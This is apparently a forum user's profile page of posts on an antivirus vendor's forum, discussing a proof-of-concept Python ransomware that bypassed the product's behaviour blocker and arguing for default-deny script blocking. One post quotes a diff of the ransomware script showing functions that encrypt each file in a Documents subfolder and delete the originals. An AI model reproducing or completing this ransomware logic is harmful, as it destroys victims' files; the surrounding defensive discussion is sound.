Jump to content


  • Posts

  • Joined

  • Last visited

About RoboMan

  • Rank

Profile Information

  • Gender
  • Location

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Imagine they're unusable because their antivirus couldn't stop a ransomware script. Either way, aforementioned, the only solution would be default denying.
  2. Marcos, I agree and understand what your point is; nevertheless we can't compromise security in exchange for lower FPs. I deeply believe this is not a fact to discuss on signature or behaviour-detection, but actually in default-deny and software restriction. The only way to assure the user isn't getting infected by a random script is to block it by default. An advanced user can later unblock it/whitelist it if he was intentionally running it; but most novice/normal users will not even realise there was a python script running in the background, therefore a default deny action over it would be enough to avoid infection, don't you think?
  3. - encrypt(dir+filename, dir+filename+""".enc""") + encrypt(dir+filename, dir+filename+".enc")
  4. Thank you. I hope devs find a way to fight back these kind of malware; OP realized it was being detected and counter-responded (still it's educational) --- pyrate.py 2020-05-11 16:02:57.354937100 +0000 +++ "pyrate - Copy.py" 2020-05-04 20:34:50.040466800 +0000 @@ -11,7 +11,7 @@ return buf.value -def enc(src, dst): +def encrypt(src, dst): print("Encrypting " + dst) srcfile = open(src, 'rb') dstfile = open(dst, 'wb') @@ -19,10 +19,10 @@ srcfile.close() dstfile.close() os.remove(src) -def ran(dir): +def ransom(dir): for filename in os.listdir(dir): if not filename.endswith(".enc"): - enc(dir+filename, dir+filename+".enc") + encrypt(dir+filename, dir+filename+".enc") -ran(find_mydocs()+"\\test\\") +ransom(find_mydocs()+"\\test\\") Hopefully devs find a way to cut it off from root
  5. Are you sure this isn't a Windows configuration rather than ESET? Windows 10 usually re-opens many software (interface) after a reboot, by default it remembers everything you had opened.
  6. Marcos, I just sent the download link, you can check your inbox. I'd like your insight in the matter please
  7. I play my secret card, level 100, which counters ignored threads by staff: tagging @Marcos
  8. Hello everybody, evening to y'all. Well, basically this: https://malwaretips.com/threads/pyrate-behavior-blocker-bypass-poc-3.100636/ MacDefender has over time shared several files that bypass many antivirus behaviour blockers by using 3rd party signed executable files, like 7-zip. He just reciently shared a recreative malware test file using Python, which dodged any ESET protection. I believe this isn't as bad, since using a signed trusteable file for malicious activity is difficult to deal with (CCleaner case, for example). I'd like to know your opinion, why ESET fails to realize what's going on, and how to prevent this kind of attacks by happening. As it goes: If you'd like the sample to have a closer look, I can share it over DM to avoid catastrophes.
  9. Greetings. I've been having the same yellow alert issue for some days, even today a couple of times. It appears randomly whenever i'm surfing the web and i use a Wi-Fi connection. I would like to know if there's a risk when recieving such a server? Like, LiveGrid servers are not accesible at all, so no protection from that module? Anyways, alert is just present for some seconds maybe a minute till it dissapears.
  • Create New...